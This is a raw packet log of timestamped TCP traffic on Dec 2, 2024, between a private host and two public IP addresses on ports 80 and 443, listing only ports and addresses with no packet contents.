Dec 2, 2024 07:38:01.006982088 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:01.011039019 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:01.011049986 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:01.011115074 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:01.011115074 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:01.015080929 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:01.015252113 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:05.246999025 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:05.247051954 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:06.123274088 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:06.123321056 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:06.123420000 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:06.130511045 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:06.130532026 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:06.411005974 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:07.725848913 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:07.725939989 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:07.729617119 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:07.729640961 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:07.729871035 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:07.739001036 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:07.779340982 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.095268011 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.095307112 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.095357895 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.095375061 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.095416069 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.117427111 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.117438078 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.117553949 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.117569923 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.169459105 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.269195080 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.269213915 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.269336939 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.269354105 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.307801962 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.307811975 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.307882071 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.307904005 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.332730055 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.332736969 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.332811117 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.332834005 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.364562035 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.364577055 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.364598036 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.364623070 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.364635944 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.364651918 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.387965918 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.387975931 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.388000965 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.388215065 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.388215065 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.388231993 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.435079098 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.481030941 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.481041908 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.481067896 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.481306076 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.502697945 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.502711058 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.502746105 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.502846003 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.502968073 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.522099018 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.522110939 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.522140980 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.522207022 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.522249937 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.536115885 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.536123991 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.536250114 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.536267996 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.549285889 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.549330950 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.549427032 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.549442053 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.549485922 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.568223000 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.568279028 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.568377018 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.568387985 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.568434000 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.581022978 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.581073999 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.581130981 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.581151009 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.581190109 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.598958015 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.598995924 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.599052906 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.599064112 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.599097967 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.653841019 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.694796085 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.694808006 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.694828033 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.694874048 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.694946051 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.703340054 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.703347921 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.703455925 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.703469992 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.712524891 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.712533951 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.712647915 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.712660074 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.722831964 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.722839117 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.722949982 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.722959995 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.727961063 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.727969885 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.728069067 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.728079081 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.733217001 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.733225107 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.733314037 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.733325958 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.739927053 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.739934921 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.740008116 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.740022898 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.745115995 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.745122910 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.745276928 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.745311022 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.750796080 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.750828981 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.750897884 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.750910044 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.750927925 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.757033110 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.757066965 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.757117987 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.757128954 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.757158041 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.763233900 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.763334036 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.763344049 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.768280029 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.768409014 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.768419027 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.774600029 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.774672985 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.774681091 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.780355930 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.780476093 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.780487061 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.794495106 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.794656038 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.794667959 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.841355085 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.875436068 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.875449896 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.875466108 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.875549078 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.875549078 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.898432016 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.898443937 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.898503065 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.898531914 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.901890993 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.901900053 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.901982069 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.901995897 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.906254053 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.906285048 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.906316042 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.906328917 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.906353951 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.911298037 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.911362886 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.911370993 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.915348053 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.915425062 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.915435076 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.918047905 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.918118000 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.918126106 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.921418905 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.921506882 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.921514988 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.924838066 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.924935102 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.924942970 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.926619053 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.926752090 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.926760912 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.930022955 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.930130005 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.930140972 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.933510065 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.933608055 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.933615923 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.935652018 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.935760975 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.935770988 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.938858032 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.938936949 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.938946009 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.953669071 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.953744888 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:08.953762054 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:08.997615099 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.074461937 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.074474096 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.074676037 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.074692011 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.119676113 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.119685888 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.119921923 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.119936943 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.121715069 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.121725082 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.121746063 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.121790886 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.121802092 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.121836901 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.125031948 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.125045061 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.125070095 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.125133038 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.125143051 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.125160933 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.127661943 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.127675056 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.127746105 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.127756119 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.130944967 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.130980015 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.131019115 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.131031990 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.131059885 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.133687973 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.133769989 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.133781910 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.137068987 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.137162924 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.137172937 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.139720917 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.139837980 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.139847040 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.142354012 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.142436981 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.142445087 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.144998074 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.145077944 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.145086050 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.148004055 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.148086071 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.148094893 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.150595903 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.150675058 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.150684118 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.154036045 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.154110909 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.154119968 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.156641006 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.156704903 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.156713963 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.160057068 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.160152912 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.160164118 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.200664043 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.275799036 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.275813103 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.275996923 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.276019096 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.320755959 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.320792913 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.320955992 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.320971012 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.323551893 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.323561907 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.323587894 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.323646069 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.323646069 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.323658943 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.326176882 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.326185942 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.326301098 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.326318026 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.328953981 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.328963041 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.329032898 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.329045057 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.332230091 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.332242012 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.332282066 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.332292080 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.332303047 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.335290909 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.335330963 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.335350037 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.335361958 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.335396051 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.338409901 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.338471889 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.338484049 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.340908051 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.341047049 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.341061115 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.344243050 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.344329119 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.344345093 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.346957922 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.347033024 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.347043037 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.349133015 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.349195957 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.349215984 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.352561951 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.352668047 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.352683067 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.355618000 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.355680943 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.355694056 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.359101057 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.359211922 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.359222889 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.361263037 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.361335039 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.361350060 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.403881073 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.478158951 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.478169918 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.478257895 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.478277922 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.522252083 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.522291899 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.522367001 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.522387028 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.522445917 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.525319099 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.525326967 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.525345087 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.525378942 CET	49716	443	192.168.2.10	142.215.209.77
